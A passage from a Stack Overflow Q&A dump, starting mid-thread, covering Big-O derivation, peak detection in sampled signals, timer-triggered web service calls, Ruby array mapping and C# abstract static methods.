For code B, although the inner loop never steps in and executes foo(), its condition is still evaluated once for each of the outer loop's n iterations, which is O(n).
A: I don't know how to programmatically solve this, but the first thing people do is sample the algorithm for certain patterns in the number of operations done, say 4n^2 + 2n + 1. We have 2 rules:
*
*If we have a sum of terms, the term with the largest growth rate is kept, with other terms omitted.
*If we have a product of several factors constant factors are omitted.
If we simplify f(x), where f(x) is the formula for the number of operations done (4n^2 + 2n + 1, explained above), we obtain the big-O value [O(n^2) in this case]. But this would have to account for Lagrange interpolation in the program, which may be hard to implement. And what if the real big-O value were O(2^n), or something like O(x^n)? Then this algorithm probably wouldn't be programmable. But if someone proves me wrong, give me the code . . . .
A: If you want to estimate the order of your code empirically rather than by analyzing the code, you could stick in a series of increasing values of n and time your code. Plot your timings on a log-log scale. If the code is O(n^k), the values should fall on a line of slope k.
This has several advantages over just studying the code. For one thing, you can see whether you're in the range where the run time approaches its asymptotic order. Also, you may find that some code that you thought was order O(n) is really order O(n^2), for example, because of time spent in library calls.
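A minimal sketch of the idea (in Python, timing the built-in sort as a stand-in for your own code; the sizes and the least-squares fit are illustrative choices):
import math
import random
import time

sizes = [2 ** k for k in range(10, 18)]
times = []
for n in sizes:
    data = [random.random() for _ in range(n)]
    t0 = time.perf_counter()
    sorted(data)
    times.append(time.perf_counter() - t0)

# least-squares slope of log(time) vs log(n): ~1 suggests near-linear, ~2 suggests O(n^2)
xs = [math.log(n) for n in sizes]
ys = [math.log(t) for t in times]
mx = sum(xs) / len(xs)
my = sum(ys) / len(ys)
slope = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / sum((x - mx) ** 2 for x in xs)
print("fitted slope ~ %.2f" % slope)  # expect a bit above 1 for an n log n sort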
A: I'll do my best to explain it here in simple terms, but be warned that this topic takes my students a couple of months to finally grasp. You can find more information in Chapter 2 of the Data Structures and Algorithms in Java book.
There is no mechanical procedure that can be used to get the BigOh.
As a "cookbook", to obtain the BigOh from a piece of code you first need to realize that you are creating a math formula to count how many steps of computations get executed given an input of some size.
The purpose is simple: to compare algorithms from a theoretical point of view, without the need to execute the code. The lesser the number of steps, the faster the algorithm.
For example, let's say you have this piece of code:
int sum(int* data, int N) {
int result = 0; // 1
for (int i = 0; i < N; i++) { // 2
result += data[i]; // 3
}
return result; // 4
}
This function returns the sum of all the elements of the array, and we want to create a formula to count the computational complexity of that function:
Number_Of_Steps = f(N)
So we have f(N), a function to count the number of computational steps. The input of the function is the size of the structure to process. It means that this function is called such as:
Number_Of_Steps = f(data.length)
The parameter N takes the data.length value. Now we need the actual definition of the function f(). This is done from the source code, in which each interesting line is numbered from 1 to 4.
There are many ways to calculate the BigOh. From this point forward we are going to assume that every sentence that doesn't depend on the size of the input data takes a constant number C of computational steps.
We are going to add the individual number of steps of the function, and neither the local variable declaration nor the return statement depends on the size of the data array.
That means that lines 1 and 4 take C amount of steps each, and the function is somewhat like this:
f(N) = C + ??? + C
The next part is to define the value of the for statement. Remember that we are counting the number of computational steps, meaning that the body of the for statement gets executed N times. That's the same as adding C, N times:
f(N) = C + (C + C + ... + C) + C = C + N * C + C
There is no mechanical rule to count how many times the body of the for gets executed, you need to count it by looking at what does the code do. To simplify the calculations, we are ignoring the variable initialization, condition and increment parts of the for statement.
To get the actual BigOh we need the Asymptotic analysis of the function. This is roughly done like this:
*
*Take away all the constants C.
*From f() get the polynomial in its standard form.
*Divide the terms of the polynomial and sort them by the rate of growth.
*Keep the one that grows bigger when N approaches infinity.
Our f() has two terms:
f(N) = 2 * C * N ^ 0 + 1 * C * N ^ 1
Taking away all the C constants and redundant parts:
f(N) = 1 + N ^ 1
Since the last term is the one which grows bigger when N approaches infinity (think of limits), this is the BigOh argument, and the sum() function has a BigOh of:
O(N)
There are a few tricks to solve some tricky ones: use summations whenever you can.
As an example, this code can be easily solved using summations:
for (i = 0; i < 2*n; i += 2) { // 1
for (j=n; j > i; j--) { // 2
foo(); // 3
}
}
The first thing you need to ask is the order of execution of foo(). While it is usually O(1), you need to ask your professors about it. O(1) means (almost, mostly) constant C, independent of the size N.
The for statement on the sentence number one is tricky. While the index ends at 2 * N, the increment is done by two. That means that the first for gets executed only N steps, and we need to divide the count by two.
f(N) = Summation(i from 1 to 2 * N / 2)( ... ) =
= Summation(i from 1 to N)( ... )
The sentence number two is even trickier since it depends on the value of i. Take a look: the index i takes the values: 0, 2, 4, 6, 8, ..., 2 * N, and the second for get executed: N times the first one, N - 2 the second, N - 4 the third... up to the N / 2 stage, on which the second for never gets executed.
On formula, that means:
f(N) = Summation(i from 1 to N)( Summation(j = ???)( ) )
Again, we are counting the number of steps. And by definition, every summation should always start at one, and end at a number bigger-or-equal than one.
f(N) = Summation(i from 1 to N)( Summation(j = 1 to (N - (i - 1) * 2)( C ) )
(We are assuming that foo() is O(1) and takes C steps.)
We have a problem here: when i takes the value N / 2 + 1 upwards, the inner Summation ends at a negative number! That's impossible and wrong. We need to split the summation in two, being the pivotal point the moment i takes N / 2 + 1.
f(N) = Summation(i from 1 to N / 2)( Summation(j = 1 to (N - (i - 1) * 2)) * ( C ) ) + Summation(i from 1 to N / 2) * ( C )
Since the pivotal moment i > N / 2, the inner for won't get executed, and we are assuming a constant C execution complexity on its body.
Now the summations can be simplified using some identity rules:
*
*Summation(w from 1 to N)( C ) = N * C
*Summation(w from 1 to N)( A (+/-) B ) = Summation(w from 1 to N)( A ) (+/-) Summation(w from 1 to N)( B )
*Summation(w from 1 to N)( w * C ) = C * Summation(w from 1 to N)( w ) (C is a constant, independent of w)
*Summation(w from 1 to N)( w ) = (N * (N + 1)) / 2
Applying some algebra:
f(N) = Summation(i from 1 to N / 2)( (N - (i - 1) * 2) * ( C ) ) + (N / 2)( C )
f(N) = C * Summation(i from 1 to N / 2)( (N - (i - 1) * 2)) + (N / 2)( C )
f(N) = C * (Summation(i from 1 to N / 2)( N ) - Summation(i from 1 to N / 2)( (i - 1) * 2)) + (N / 2)( C )
f(N) = C * (( N ^ 2 / 2 ) - 2 * Summation(i from 1 to N / 2)( i - 1 )) + (N / 2)( C )
=> Summation(i from 1 to N / 2)( i - 1 ) = Summation(i from 1 to N / 2 - 1)( i )
f(N) = C * (( N ^ 2 / 2 ) - 2 * Summation(i from 1 to N / 2 - 1)( i )) + (N / 2)( C )
f(N) = C * (( N ^ 2 / 2 ) - 2 * ( (N / 2 - 1) * (N / 2 - 1 + 1) / 2) ) + (N / 2)( C )
=> (N / 2 - 1) * (N / 2 - 1 + 1) / 2 =
(N / 2 - 1) * (N / 2) / 2 =
((N ^ 2 / 4) - (N / 2)) / 2 =
(N ^ 2 / 8) - (N / 4)
f(N) = C * (( N ^ 2 / 2 ) - 2 * ( (N ^ 2 / 8) - (N / 4) )) + (N / 2)( C )
f(N) = C * (( N ^ 2 / 2 ) - ( (N ^ 2 / 4) - (N / 2) )) + (N / 2)( C )
f(N) = C * (( N ^ 2 / 2 ) - (N ^ 2 / 4) + (N / 2)) + (N / 2)( C )
f(N) = C * ( N ^ 2 / 4 ) + C * (N / 2) + C * (N / 2)
f(N) = C * ( N ^ 2 / 4 ) + 2 * C * (N / 2)
f(N) = C * ( N ^ 2 / 4 ) + C * N
f(N) = C * 1/4 * N ^ 2 + C * N
And the BigOh is:
O(N²)
A: Basically the thing that crops up 90% of the time is just analyzing loops. Do you have single, double, triple nested loops? Then you have O(n), O(n^2), O(n^3) running time.
Very rarely (unless you are writing a platform with an extensive base library, like for instance the .NET BCL or C++'s STL) will you encounter anything that is more difficult than just looking at your loops (for statements, while, goto, etc...)
A: While knowing how to figure out the Big O time for your particular problem is useful, knowing some general cases can go a long way in helping you make decisions in your algorithm.
Here are some of the most common cases, lifted from http://en.wikipedia.org/wiki/Big_O_notation#Orders_of_common_functions:
O(1) - Determining if a number is even or odd; using a constant-size lookup table or hash table
O(log n) - Finding an item in a sorted array with a binary search
O(n) - Finding an item in an unsorted list; adding two n-digit numbers
O(n²) - Multiplying two n-digit numbers by a simple algorithm; adding two n×n matrices; bubble sort or insertion sort
O(n³) - Multiplying two n×n matrices by simple algorithm
O(c^n) - Finding the (exact) solution to the traveling salesman problem using dynamic programming; determining if two logical statements are equivalent using brute force
O(n!) - Solving the traveling salesman problem via brute-force search
O(n^n) - Often used instead of O(n!) to derive simpler formulas for asymptotic complexity
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3255",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "970"
} |
Q: Peak detection of measured signal We use a data acquisition card to take readings from a device that increases its signal to a peak and then falls back to near the original value. To find the peak value we currently search the array for the highest reading and use the index to determine the timing of the peak value which is used in our calculations.
This works well if the highest value is the peak we are looking for but if the device is not working correctly we can see a second peak which can be higher than the initial peak. We take 10 readings a second from 16 devices over a 90 second period.
My initial thoughts are to cycle through the readings checking to see if the previous and next points are less than the current to find a peak and construct an array of peaks. Maybe we should be looking at a average of a number of points either side of the current position to allow for noise in the system. Is this the best way to proceed or are there better techniques?
We do use LabVIEW and I have checked the LAVA forums and there are a number of interesting examples. This is part of our test software and we are trying to avoid using too many non-standard VI libraries so I was hoping for feedback on the process/algorithms involved rather than specific code.
A: There are lots and lots of classic peak detection methods, any of which might work. You'll have to see what, in particular, bounds the quality of your data. Here are basic descriptions:
*
*Between any two points in your data, (x(0), y(0)) and (x(n), y(n)), add up |y(i + 1) - y(i)| for 0 <= i < n and call this T ("travel"), and set R ("rise") to y(n) - y(0) + k for suitably small k. T/R > 1 indicates a peak (without the absolute values the sum would telescope to exactly the rise). This works OK if large travel due to noise is unlikely or if noise distributes symmetrically around a base curve shape. For your application, accept the earliest peak with a score above a given threshold, or analyze the curve of travel per rise values for more interesting properties. (See the sketch at the end of this answer.)
*Use matched filters to score similarity to a standard peak shape (essentially, use a normalized dot-product against some shape to get a cosine-metric of similarity)
*Deconvolve against a standard peak shape and check for high values (though I often find 2 to be less sensitive to noise for simple instrumentation output).
*Smooth the data and check for triplets of equally spaced points where, if x0 < x1 < x2, y1 > 0.5 * (y0 + y2), or check Euclidean distances like this: D((x0, y0), (x1, y1)) + D((x1, y1), (x2, y2)) > D((x0, y0),(x2, y2)), which relies on the triangle inequality. Using simple ratios will again provide you a scoring mechanism.
*Fit a very simple 2-gaussian mixture model to your data (for example, Numerical Recipes has a nice ready-made chunk of code). Take the earlier peak. This will deal correctly with overlapping peaks.
*Find the best match in the data to a simple Gaussian, Cauchy, Poisson, or what-have-you curve. Evaluate this curve over a broad range and subtract it from a copy of the data after noting it's peak location. Repeat. Take the earliest peak whose model parameters (standard deviation probably, but some applications might care about kurtosis or other features) meet some criterion. Watch out for artifacts left behind when peaks are subtracted from the data.
Best match might be determined by the kind of match scoring suggested in #2 above.
I've done what you're doing before: finding peaks in DNA sequence data, finding peaks in derivatives estimated from measured curves, and finding peaks in histograms.
I encourage you to attend carefully to proper baselining. Wiener filtering or other filtering or simple histogram analysis is often an easy way to baseline in the presence of noise.
Finally, if your data is typically noisy and you're getting data off the card as unreferenced single-ended output (or even referenced, just not differential), and if you're averaging lots of observations into each data point, try sorting those observations and throwing away the first and last quartile and averaging what remains. There are a host of such outlier elimination tactics that can be really useful.
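As a sketch of method #1 above (in Python; k guards against division by zero and is an arbitrary small constant):
def travel_rise_score(y, k=1e-9):
    # T: total vertical distance travelled; R: net rise over the window
    travel = sum(abs(y[i + 1] - y[i]) for i in range(len(y) - 1))
    rise = abs(y[-1] - y[0]) + k
    return travel / rise  # ~1 for a monotone run; noticeably > 1 when a peak lies inside

print(travel_rise_score([0, 1, 2, 3]))  # monotone: ~1
print(travel_rise_score([0, 3, 0.5]))   # contains a peak: > 1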
A: I would like to contribute to this thread an algorithm that I have developed myself:
It is based on the principle of dispersion: if a new datapoint is a given x number of standard deviations away from some moving mean, the algorithm signals (also called z-score). The algorithm is very robust because it constructs a separate moving mean and deviation, such that signals do not corrupt the threshold. Future signals are therefore identified with approximately the same accuracy, regardless of the amount of previous signals. The algorithm takes 3 inputs: lag = the lag of the moving window, threshold = the z-score at which the algorithm signals and influence = the influence (between 0 and 1) of new signals on the mean and standard deviation. For example, a lag of 5 will use the last 5 observations to smooth the data. A threshold of 3.5 will signal if a datapoint is 3.5 standard deviations away from the moving mean. And an influence of 0.5 gives signals half of the influence that normal datapoints have. Likewise, an influence of 0 ignores signals completely for recalculating the new threshold: an influence of 0 is therefore the most robust option.
It works as follows:
Pseudocode
# Let y be a vector of timeseries data of at least length lag+2
# Let mean() be a function that calculates the mean
# Let std() be a function that calculates the standard deviaton
# Let absolute() be the absolute value function
# Settings (the ones below are examples: choose what is best for your data)
set lag to 5; # lag 5 for the smoothing functions
set threshold to 3.5; # 3.5 standard deviations for signal
set influence to 0.5; # between 0 and 1, where 1 is normal influence, 0.5 is half
# Initialise variables
set signals to vector 0,...,0 of length of y; # Initialise signal results
set filteredY to y(1,...,lag) # Initialise filtered series
set avgFilter to null; # Initialise average filter
set stdFilter to null; # Initialise std. filter
set avgFilter(lag) to mean(y(1,...,lag)); # Initialise first value
set stdFilter(lag) to std(y(1,...,lag)); # Initialise first value
for i=lag+1,...,t do
if absolute(y(i) - avgFilter(i-1)) > threshold*stdFilter(i-1) then
if y(i) > avgFilter(i-1)
set signals(i) to +1; # Positive signal
else
set signals(i) to -1; # Negative signal
end
# Adjust the filters
set filteredY(i) to influence*y(i) + (1-influence)*filteredY(i-1);
set avgFilter(i) to mean(filteredY(i-lag,i),lag);
set stdFilter(i) to std(filteredY(i-lag,i),lag);
else
set signals(i) to 0; # No signal
# Adjust the filters
set filteredY(i) to y(i);
set avgFilter(i) to mean(filteredY(i-lag,i),lag);
set stdFilter(i) to std(filteredY(i-lag,i),lag);
end
end
Demo
For more information, see the original answer.
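For reference, here is a direct Python translation of the pseudocode above (a sketch; the moving window is taken as the last lag filtered points, which may differ by one from the pseudocode's filteredY(i-lag,i) convention):
import numpy as np

def thresholding_algo(y, lag, threshold, influence):
    y = np.asarray(y, dtype=float)
    signals = np.zeros(len(y))
    filtered_y = y.copy()
    avg = np.zeros(len(y))
    std = np.zeros(len(y))
    avg[lag - 1] = np.mean(y[:lag])
    std[lag - 1] = np.std(y[:lag])
    for i in range(lag, len(y)):
        if abs(y[i] - avg[i - 1]) > threshold * std[i - 1]:
            signals[i] = 1 if y[i] > avg[i - 1] else -1
            # signals get only partial influence on the filters
            filtered_y[i] = influence * y[i] + (1 - influence) * filtered_y[i - 1]
        else:
            signals[i] = 0
            filtered_y[i] = y[i]
        avg[i] = np.mean(filtered_y[i - lag + 1:i + 1])
        std[i] = np.std(filtered_y[i - lag + 1:i + 1])
    return signals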
A: This problem has been studied in some detail.
There are a set of very up-to-date implementations in the TSpectrum* classes of ROOT (a nuclear/particle physics analysis tool). The code works in one- to three-dimensional data.
The ROOT source code is available, so you can grab this implementation if you want.
From the TSpectrum class documentation:
The algorithms used in this class have been published in the following references:
[1] M. Morhac et al.: Background elimination methods for multidimensional coincidence gamma-ray spectra. Nuclear Instruments and Methods in Physics Research A 401 (1997) 113-132.
[2] M. Morhac et al.: Efficient one- and two-dimensional Gold deconvolution and its application to gamma-ray spectra decomposition. Nuclear Instruments and Methods in Physics Research A 401 (1997) 385-408.
[3] M. Morhac et al.: Identification of peaks in multidimensional coincidence gamma-ray spectra. Nuclear Instruments and Methods in Physics Research A 443 (2000) 108-125.
The papers are linked from the class documentation for those of you who don't have a NIM online subscription.
The short version of what is done is that the histogram is flattened to eliminate noise, and then local maxima are detected by brute force in the flattened histogram.
A: This method is basically from David Marr's book "Vision"
Gaussian blur your signal with the expected width of your peaks.
This gets rid of noise spikes and your phase data is undamaged.
Then edge detect (LoG will do).
Then your edges were the edges of features (like peaks).
Look between edges for peaks, sort peaks by size, and you're done.
I have used variations on this and they work very well.
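A minimal sketch of this pipeline (in Python, assuming SciPy is available; it uses a sign change of the first difference in place of a full LoG edge detector, and the expected width is a parameter to tune):
import numpy as np
from scipy.ndimage import gaussian_filter1d

def marr_peaks(y, expected_width=5.0):
    # blur at the expected peak width, then find tops of the smoothed features
    smoothed = gaussian_filter1d(np.asarray(y, dtype=float), sigma=expected_width)
    d = np.diff(smoothed)
    # a +/- sign change in the slope marks the top of a smoothed feature
    return [i for i in range(1, len(d)) if d[i - 1] > 0 >= d[i]]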
A: I think you want to cross-correlate your signal with an expected, exemplar signal. But, it has been such a long time since I studied signal processing and even then I didn't take much notice.
A: You could try signal averaging, i.e. for each point, average the value with the surrounding 3 or more points. If the noise blips are huge, then even this may not help.
I realise that this was language agnostic, but guessing that you are using LabView, there are lots of pre-packaged signal processing VIs that come with LabView that you can use to do smoothing and noise reduction. The NI forums are a great place to get more specialised help on this sort of thing.
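A language-agnostic sketch of the averaging-then-compare idea from the question (written in Python; the window size of 5 is an assumption to tune against your noise level):
def smooth(data, window=5):
    # simple moving average; each point becomes the mean of its surrounding window
    half = window // 2
    out = []
    for i in range(len(data)):
        lo, hi = max(0, i - half), min(len(data), i + half + 1)
        out.append(sum(data[lo:hi]) / (hi - lo))
    return out

def local_peaks(data):
    # indices where a point is strictly higher than both neighbours
    return [i for i in range(1, len(data) - 1) if data[i - 1] < data[i] > data[i + 1]]

# peaks = local_peaks(smooth(readings))  # readings: one device's 900 samples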
A: You could apply some Standard Deviation to your logic and take notice of peaks over x%.
A: I don't know very much about instrumentation, so this might be totally impractical, but then again it might be a helpful different direction. If you know how the readings can fail, and there is a certain interval between peaks given such failures, why not do gradient descent at each interval. If the descent brings you back to an area you've searched before, you can abandon it. Depending upon the shape of the sampled surface, this also might help you find peaks faster than search.
A: Is there a qualitative difference between the desired peak and the unwanted second peak? If both peaks are "sharp" -- i.e. short in time duration -- when looking at the signal in the frequency domain (by doing FFT) you'll get energy at most bands. But if the "good" peak reliably has energy present at frequencies not existing in the "bad" peak, or vice versa, you may be able to automatically differentiate them that way.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3260",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "59"
} |
Q: Timer-based event triggers I am currently working on a project with specific requirements. A brief overview of these are as follows:
*
*Data is retrieved from external webservices
*Data is stored in SQL 2005
*Data is manipulated via a web GUI
*The windows service that communicates with the web services has no coupling with our internal web UI, except via the database.
*Communication with the web services needs to be both time-based, and triggered via user intervention on the web UI.
The current (pre-pre-production) model for web service communication triggering is via a database table that stores trigger requests generated from the manual intervention. I do not really want to have multiple trigger mechanisms, but would like to be able to populate the database table with triggers based upon the time of the call. As I see it there are two ways to accomplish this.
1) Adapt the trigger table to store two extra parameters. One being "Is this time-based or manually added?" and a nullable field to store the timing details (exact format to be determined). If it is a manually created trigger, mark it as processed when the trigger has been fired, but not if it is a timed trigger.
or
2) Create a second windows service that creates the triggers on-the-fly at timed intervals.
The second option seems like a fudge to me, but the management of option 1 could easily turn into a programming nightmare (how do you know if the last poll of the table returned the event that needs to fire, and how do you then stop it re-triggering on the next poll)
I'd appreciate it if anyone could spare a few minutes to help me decide which route (one of these two, or possibly a third, unlisted one) to take.
A: Why not use a SQL Job instead of the Windows Service? You can encapsulate all of your db "trigger" code in Stored Procedures. Then your UI and SQL Job can call the same Stored Procedures and create the triggers the same way, whether it's done manually or at a time interval.
A: The way I see it is this.
You have a Windows Service, which is playing the role of a scheduler and in it there are some classes which simply call the webservices and put the data in your databases.
So, you can use these classes directly from the WebUI as well and import the data based on the WebUI trigger.
I don't like the idea of storing a user generated action as a flag (trigger) in the database where some service will poll it (at an interval which is not under the user's control) to execute that action.
You could even convert the whole code into an exe which you can then schedule using the Windows Scheduler. And call the same exe whenever the user triggers the action from the Web UI.
A: @Vaibhav
Unfortunately, the physical architecture of the solution will not allow any direct communication between the components, other than Web UI to Database, and database to service (which can then call out to the web services). I do, however, agree that re-use of the communication classes would be the ideal here - I just can't do it within the confines of our business*
*Isn't it always the way that a technically "better" solution is stymied by external factors?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3272",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "15"
} |
Q: Mapping values from two array in Ruby I'm wondering if there's a way to do what I can do below with Python, in Ruby:
sum = reduce(lambda x, y: x + y, map(lambda x, y: x * y, weights, data))
I have two arrays of equal size with the weights and data, but I can't seem to find a function similar to map in Ruby; reduce I have working.
A: In Ruby 1.9:
weights.zip(data).map{|a,b| a*b}.reduce(:+)
In Ruby 1.8:
weights.zip(data).inject(0) {|sum,(w,d)| sum + w*d }
A: The Array.zip function does an elementwise combination of arrays. It's not quite as clean as the Python syntax, but here's one approach you could use:
weights = [1, 2, 3]
data = [4, 5, 6]
result = Array.new
a.zip(b) { |x, y| result << x * y } # For just the one operation
sum = 0
a.zip(b) { |x, y| sum += x * y } # For both operations
A: @Michiel de Mare
Your Ruby 1.9 example can be shortened a bit further:
weights.zip(data).map(&:*).reduce(:+)
Also note that in Ruby 1.8, if you require ActiveSupport (from Rails) you can use:
weights.zip(data).map(&:*).reduce(&:+)
A: Ruby has a map method (a.k.a. the collect method), which can be applied to any Enumerable object. If numbers is an array of numbers, the following line in Ruby:
numbers.map{|x| x + 5}
is the equivalent of the following line in Python:
map(lambda x: x + 5, numbers)
For more details, see here or here.
A: An alternative for the map that works for more than 2 arrays as well:
def dot(*arrays)
arrays.transpose.map {|vals| yield vals}
end
dot(weights,data) {|a,b| a*b}
# OR, if you have a third array
dot(weights,data,offsets) {|a,b,c| (a*b)+c}
This could also be added to Array:
class Array
def dot
self.transpose.map{|vals| yield vals}
end
end
[weights,data].dot {|a,b| a*b}
#OR
[weights,data,offsets].dot {|a,b,c| (a*b)+c}
A: weights = [1,2,3]
data = [10,50,30]
require 'matrix'
Vector[*weights].inner_product Vector[*data] # => 200
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3281",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "23"
} |
Q: Why can't I have abstract static methods in C#? I've been working with providers a fair bit lately, and I came across an interesting situation where I wanted to have an abstract class that had an abstract static method. I read a few posts on the topic, and it sort of made sense, but is there a nice clear explanation?
A: To add to the previous explanations, static method calls are bound to a specific method at compile-time, which rather rules out polymorphic behavior.
A: We actually override static methods (in delphi), it's a bit ugly, but it works just fine for our needs.
We use it so the classes can have a list of their available objects without the class instance, for example, we have a method that looks like this:
class function AvailableObjects: string; override;
begin
Result := 'Object1, Object2';
end;
It's ugly but necessary, this way we can instantiate just what is needed, instead of having all the classes instantianted just to search for the available objects.
This was a simple example, but the application itself is a client-server application which has all the classes available in just one server, and multiple different clients which might not need everything the server has and will never need an object instance.
So this is much easier to maintain than having one different server application for each client.
Hope the example was clear.
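For that override to compile, the base class presumably declares the method as virtual. A minimal sketch, with a hypothetical base class name:
TBaseObject = class
public
  class function AvailableObjects: string; virtual;
end;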
A: Static methods cannot be inherited or overridden, and that is why they can't be abstract. Since static methods are defined on the type, not the instance, of a class, they must be called explicitly on that type. So when you want to call a method on a child class, you need to use its name to call it. This makes inheritance irrelevant.
Assume you could, for a moment, inherit static methods. Imagine this scenario:
public static class Base
{
public static virtual int GetNumber() { return 5; }
}
public static class Child1 : Base
{
public static override int GetNumber() { return 1; }
}
public static class Child2 : Base
{
public static override int GetNumber() { return 2; }
}
If you call Base.GetNumber(), which method would be called? Which value returned? It's pretty easy to see that without creating instances of objects, inheritance is rather hard. Abstract methods without inheritance are just methods that don't have a body, so can't be called.
A: Another respondent (McDowell) said that polymorphism only works for object instances. That should be qualified; there are languages that do treat classes as instances of a "Class" or "Metaclass" type. These languages do support polymorphism for both instance and class (static) methods.
C#, like Java and C++ before it, is not such a language; the static keyword is used explicitly to denote that the method is statically-bound rather than dynamic/virtual.
A: Static methods are not instantiated as such, they're just available without an object reference.
A call to a static method is done through the class name, not through an object reference, and the Intermediate Language (IL) code to call it will call the abstract method through the name of the class that defined it, not necessarily the name of the class you used.
Let me show an example.
With the following code:
public class A
{
public static void Test()
{
}
}
public class B : A
{
}
If you call B.Test, like this:
class Program
{
static void Main(string[] args)
{
B.Test();
}
}
Then the actual code inside the Main method is as follows:
.entrypoint
.maxstack 8
L0000: nop
L0001: call void ConsoleApplication1.A::Test()
L0006: nop
L0007: ret
As you can see, the call is made to A.Test, because it was the A class that defined it, and not to B.Test, even though you can write the code that way.
If you had class types, like in Delphi, where you can make a variable referring to a type and not an object, you would have more use for virtual and thus abstract static methods (and also constructors), but they aren't available and thus static calls are non-virtual in .NET.
I realize that the IL designers could allow the code to be compiled to call B.Test, and resolve the call at runtime, but it still wouldn't be virtual, as you would still have to write some kind of class name there.
Virtual methods, and thus abstract ones, are only useful when you're using a variable which, at runtime, can contain many different types of objects, and you thus want to call the right method for the current object you have in the variable. With static methods you need to go through a class name anyway, so the exact method to call is known at compile time because it can't and won't change.
Thus, virtual/abstract static methods are not available in .NET.
A: With .NET 6 / C# 10/next/preview you are able to do exactly that with "Static abstract members in interfaces".
(At the time of writing the code compiles successfully but some IDEs have problems highlighting the code)
SharpLab Demo
using System;
namespace StaticAbstractTesting
{
public interface ISomeAbstractInterface
{
public abstract static string CallMe();
}
public class MyClassA : ISomeAbstractInterface
{
static string ISomeAbstractInterface.CallMe()
{
return "You called ClassA";
}
}
public class MyClassB : ISomeAbstractInterface
{
static string ISomeAbstractInterface.CallMe()
{
return "You called ClassB";
}
}
public class Program
{
public static void Main(string[] args)
{
UseStaticClassMethod<MyClassA>();
UseStaticClassMethod<MyClassB>();
}
public static void UseStaticClassMethod<T>() where T : ISomeAbstractInterface
{
Console.WriteLine($"{typeof(T).Name}.CallMe() result: {T.CallMe()}");
}
}
}
Since this is a major change in the runtime, the resulting IL code also looks really clean, which means that this is not just syntactic sugar.
public static void UseStaticClassMethodSimple<T>() where T : ISomeAbstractInterface {
IL_0000: constrained. !!T
IL_0006: call string StaticAbstractTesting.ISomeAbstractInterface::CallMe()
IL_000b: call void [System.Console]System.Console::WriteLine(string)
IL_0010: ret
}
Resources:
*
*https://learn.microsoft.com/en-us/dotnet/core/compatibility/core-libraries/6.0/static-abstract-interface-methods
*https://github.com/dotnet/csharplang/issues/4436
A: Here is a situation where there is definitely a need for inheritance for static fields and methods:
abstract class Animal
{
protected static string[] legs;
static Animal() {
legs=new string[0];
}
public static void printLegs()
{
foreach (string leg in legs) {
Console.WriteLine(leg);
}
}
}
class Human: Animal
{
static Human() {
legs=new string[] {"left leg", "right leg"};
}
}
class Dog: Animal
{
static Dog() {
legs=new string[] {"left foreleg", "right foreleg", "left hindleg", "right hindleg"};
}
}
public static void Main() {
Dog.printLegs();
Human.printLegs();
}
//what is the output?
//does each subclass get its own copy of the array "legs"?
A: This question is 12 years old but it still needs to be given a better answer. As a few noted in the comments, and contrary to what all the other answers pretend, it would certainly make sense to have static abstract methods in C#. As philosopher Daniel Dennett put it, a failure of imagination is not an insight into necessity. There is a common mistake in not realizing that C# is not only an OOP language. A pure OOP perspective on a given concept leads to a restricted and in the current case misguided examination. Polymorphism is not only about subtyping polymorphism: it also includes parametric polymorphism (aka generic programming) and C# has been supporting this for a long time now. Within this additional paradigm, abstract classes (and most types) are not only used to provide a type to instances. They can also be used as bounds for generic parameters; something that has been understood by users of certain languages (like for example Haskell, but also more recently Scala, Rust or Swift) for years.
In this context you may want to do something like this:
void Catch<TAnimal>() where TAnimal : Animal
{
string scientificName = TAnimal.ScientificName; // abstract static property
Console.WriteLine($"Let's catch some {scientificName}");
…
}
And here the capacity to express static members that can be specialized by subclasses totally makes sense!
Unfortunately C# does not allow abstract static members but I'd like to propose a pattern that can emulate them reasonably well. This pattern is not perfect (it imposes some restrictions on inheritance) but as far as I can tell it is typesafe.
The main idea is to associate an abstract companion class (here SpeciesFor<TAnimal>) to the one that should contain static abstract members (here Animal):
public abstract class SpeciesFor<TAnimal> where TAnimal : Animal
{
public static SpeciesFor<TAnimal> Instance { get { … } }
// abstract "static" members
public abstract string ScientificName { get; }
…
}
public abstract class Animal { … }
Now we would like to make this work:
void Catch<TAnimal>() where TAnimal : Animal
{
string scientificName = SpeciesFor<TAnimal>.Instance.ScientificName;
Console.WriteLine($"Let's catch some {scientificName}");
…
}
Of course we have two problems to solve:
*
*How do we make sure an implementer of a subclass of Animal provides a specific instance of SpeciesFor<TAnimal> to this subclass?
*How does the property SpeciesFor<TAnimal>.Instance retrieve this information?
Here is how we can solve 1:
public abstract class Animal<TSelf> where TSelf : Animal<TSelf>
{
private Animal(…) {}
public abstract class OfSpecies<TSpecies> : Animal<TSelf>
where TSpecies : SpeciesFor<TSelf>, new()
{
protected OfSpecies(…) : base(…) { }
}
…
}
By making the constructor of Animal<TSelf> private we make sure that all its subclasses are also subclasses of inner class Animal<TSelf>.OfSpecies<TSpecies>. So these subclasses must specify a TSpecies type that has a new() bound.
For 2 we can provide the following implementation:
public abstract class SpeciesFor<TAnimal> where TAnimal : Animal<TAnimal>
{
private static SpeciesFor<TAnimal> _instance;
public static SpeciesFor<TAnimal> Instance => _instance ??= MakeInstance();
private static SpeciesFor<TAnimal> MakeInstance()
{
Type t = typeof(TAnimal);
while (true)
{
if (t.IsConstructedGenericType
&& t.GetGenericTypeDefinition() == typeof(Animal<>.OfSpecies<>))
return (SpeciesFor<TAnimal>)Activator.CreateInstance(t.GenericTypeArguments[1]);
t = t.BaseType;
if (t == null)
throw new InvalidProgramException();
}
}
// abstract "static" members
public abstract string ScientificName { get; }
…
}
How do we know that the reflection code inside MakeInstance() never throws? As we've already said, almost all classes within the hierarchy of Animal<TSelf> are also subclasses of Animal<TSelf>.OfSpecies<TSpecies>. So we know that for these classes a specific TSpecies must be provided. This type is also necessarily constructible thanks to the constraint : new(). But this still leaves out abstract types like Animal<Something> that have no associated species. Now we can convince ourselves that the curiously recurring template pattern where TAnimal : Animal<TAnimal> makes it impossible to write SpeciesFor<Animal<Something>>.Instance as type Animal<Something> is never a subtype of Animal<Animal<Something>>.
Et voilà:
